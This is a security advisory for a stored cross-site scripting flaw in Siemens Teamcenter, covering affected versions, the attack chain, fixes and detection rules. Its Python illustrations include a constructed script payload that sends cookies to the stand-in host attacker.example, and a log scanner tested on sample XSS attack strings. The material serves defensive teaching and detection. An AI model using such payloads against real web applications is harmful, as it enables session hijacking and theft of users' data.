Siemens Teamcenter Vulnerability CVE-2026-33862 - Cross-Site Scripting
Siemens Teamcenter versions V2312 (before V2312.0014), V2406 (before V2406.0012), V2412 (before V2412.0009), V2506 (before V2506.0005), and V2512 are vulnerable to cross-site scripting (XSS) due to improper encoding or filtering of user-supplied data, potentially leading to arbitrary code execution by other users.
A cross-site scripting (XSS) vulnerability, identified as CVE-2026-33862, affects multiple versions of Siemens Teamcenter. Specifically, Teamcenter V2312 (all versions before V2312.0014), Teamcenter V2406 (all versions before V2406.0012), Teamcenter V2412 (all versions before V2412.0009), Teamcenter V2506 (all versions before V2506.0005), and Teamcenter V2512 are impacted. The vulnerability stems from the application’s failure to properly encode or filter user-supplied data. This flaw allows a remote attacker to inject malicious scripts into the application that can then be executed by other users when they interact with the affected page, potentially leading to data theft, session hijacking, or other malicious activities. The vulnerability was reported on 2026-05-12.
Attack Chain
- An attacker crafts a malicious payload containing JavaScript code.
- The attacker injects the payload into a vulnerable Teamcenter input field, such as a comment, name, or description.
- The attacker submits the form or triggers the action that saves the malicious input to the Teamcenter database.
- A legitimate user accesses the page or resource where the injected payload is displayed.
- The victim’s web browser executes the attacker-controlled JavaScript code within the context of the Teamcenter web application.
- The malicious script can then perform actions such as reading the user's session cookie (where it is not marked HttpOnly), issuing requests to Teamcenter on the user's behalf, redirecting the user to a malicious website, or modifying the content of the page.
- With a stolen session cookie, or by driving the application from inside the victim's browser session, the attacker can act as that user and gain unauthorized access to Teamcenter data.
Impact
Successful exploitation of this XSS vulnerability (CVE-2026-33862) could lead to the execution of arbitrary JavaScript code in the context of other Teamcenter users’ browsers. This can result in session hijacking, theft of sensitive information, defacement of the application, or redirection to malicious websites. Given the potential for unauthorized access and data manipulation, this vulnerability poses a significant risk to organizations using affected versions of Siemens Teamcenter.
Recommendation
- Upgrade to a fixed release to remediate CVE-2026-33862: V2312.0014 or later, V2406.0012 or later, V2412.0009 or later, or V2506.0005 or later. This page lists V2512 as affected without naming a fixed build, so consult the Siemens advisory for V2512 guidance (see references).
- Deploy the Sigma rule "Detect Suspicious Teamcenter URI Activity" to identify potential exploitation attempts by monitoring for specific patterns in HTTP requests to the Teamcenter web tier.
- In customer-developed Teamcenter extensions and web-client customizations, validate user input and encode output for the HTML context it is rendered in. This is defence in depth and does not replace the vendor fix.
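The attack chain above and the output-encoding recommendation, as an added illustration that is not Teamcenter code (Teamcenter's web tier is Java; Python is used here only to show the principle): a comment renderer that concatenates stored data into HTML beside one that encodes at the point of output, an attribute-context renderer, and an allowlist check for a display-name field. The payload, the attacker host name, the field names and the rendering functions are all constructed for this example.

```python
import html
import re

# Constructed payload of the kind the attack chain describes: if a browser executed it,
# it would send the victim's cookies to an attacker-controlled host (hypothetical name).
PAYLOAD = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"


def render_comment_unsafe(author, body):
    """Vulnerable: stored values are concatenated into the HTML exactly as saved."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    """Hardened: encode at the point of output, for the HTML text context."""
    return (f'<div class="comment"><b>{html.escape(author, quote=True)}</b>: '
            f'{html.escape(body, quote=True)}</div>')


def render_title_attr_safe(title):
    """Attribute context: quote=True also encodes " and ' so the value cannot
    close the attribute and start an event-handler attribute of its own."""
    return f'<a href="/item" title="{html.escape(title, quote=True)}">item</a>'


# Allowlist for a display-name field (hypothetical policy): word characters,
# space, dot, apostrophe and hyphen only. Markup is rejected, not "cleaned".
NAME_OK = re.compile(r"^[\w .'-]{1,64}$")


def validate_display_name(name):
    return NAME_OK.match(name) is not None


def script_tag_present(rendered):
    """True if an unencoded <script> start tag survived rendering."""
    return re.search(r"<\s*script\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    print(render_comment_unsafe("eve", PAYLOAD))   # the browser would run the script
    print(render_comment_safe("eve", PAYLOAD))     # shown as inert text instead
    print(render_title_attr_safe('x" onmouseover="alert(1)'))
```

Encoding belongs at output, not at input: the same stored string may be placed in HTML text, an attribute, or a JavaScript string, and each context needs its own encoding. Marking the session cookie HttpOnly stops the `document.cookie` exfiltration in the constructed payload but not the rest of the attack chain, since injected script can still issue requests in the victim's session.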
Detection coverage (2 rules)
- Detect Suspicious Teamcenter URI Activity (level: medium). Detects CVE-2026-33862 exploitation by monitoring for suspicious characters in Teamcenter URI requests indicative of XSS attempts.
- Detect Teamcenter URI XSS Attempt via Base64 Encoded Payload (level: medium). Detects CVE-2026-33862 exploitation by monitoring for base64 encoded strings in Teamcenter URI requests indicative of obfuscated XSS payloads.
Both rules inspect the request URI only. A payload submitted in a POST body, as in the form-submission step of the attack chain, is not visible to them unless the web tier logs request bodies, so treat them as medium-confidence coverage rather than complete detection.
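What the two URI rules look for, as an added example rather than the platform's actual Sigma queries: a small scanner that applies the same two checks (suspicious markup in the URL-decoded request URI, and base64 tokens in the URI that decode to markup) to constructed access-log lines in combined log format. The path prefixes /awc/ and /tc/ used to scope the check to the Teamcenter web tier are an assumption for the example, as are the log lines and rule names.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Assumption for this example: the Teamcenter web tier is served under these
# prefixes. Adjust to the deployment; they are not taken from the advisory.
TEAMCENTER_PATH_PREFIXES = ("/awc/", "/tc/")

# Rule 1: tag openers, javascript: URLs and common event-handler attributes.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|body|object)\b"
    r"|javascript\s*:"
    r"|\bon(error|load|click|mouseover|focus|blur|submit|input|change)\s*=",
    re.IGNORECASE,
)
# Rule 2: candidate base64 tokens of 16+ characters standing on their own.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")

# Minimal combined-log-format parser: only method, URI and status are needed.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def decode_uri(uri):
    """URL-decode up to twice so a double-encoded '<' (%253C) is caught as well."""
    decoded = uri
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def b64_payload_hits(text):
    """Return decoded base64 tokens from text whose contents contain XSS markers."""
    hits = []
    for tok in B64_TOKEN.findall(text):
        core = tok.rstrip("=")
        padded = core + "=" * (-len(core) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            continue  # path segments and ordinary words rarely decode cleanly
        blob = raw.decode("utf-8", errors="ignore")
        if XSS_MARKERS.search(blob):
            hits.append(blob)
    return hits


def scan_line(line):
    """Return the names of the rules that fire on one access-log line."""
    m = LOG_LINE.match(line)
    if not m or not m.group("uri").startswith(TEAMCENTER_PATH_PREFIXES):
        return []
    decoded = decode_uri(m.group("uri"))
    fired = []
    if XSS_MARKERS.search(decoded):
        fired.append("teamcenter_uri_suspicious_chars")
    if b64_payload_hits(decoded):
        fired.append("teamcenter_uri_base64_xss")
    return fired


def scan_log(lines):
    return [(i, rule) for i, line in enumerate(lines) for rule in scan_line(line)]


# Constructed sample log: two benign requests, a raw XSS attempt, a base64-wrapped
# attempt, and a request outside the Teamcenter path that must not alert.
B64_PAYLOAD = base64.b64encode(b"<img src=x onerror=alert(1)>").decode()
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2026:10:01:02 +0000] "GET /awc/ HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/May/2026:10:01:09 +0000] "GET /awc/search?query=gearbox%20housing&page=1 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [12/May/2026:10:03:31 +0000] "GET /awc/search?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2048',
    f'10.0.0.9 - - [12/May/2026:10:04:44 +0000] "POST /tc/rest/comments?body={B64_PAYLOAD} HTTP/1.1" 201 64',
    '10.0.0.7 - - [12/May/2026:10:05:00 +0000] "GET /other/app?q=%3Cscript%3E HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for idx, rule in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {rule}")
```

The base64 check is the noisier of the two: any opaque token of sixteen or more base64 characters is decoded and inspected, and only tokens whose plaintext contains a tag opener, `javascript:` or an event handler are reported, which keeps legitimate encoded identifiers from alerting while still catching wrapped payloads.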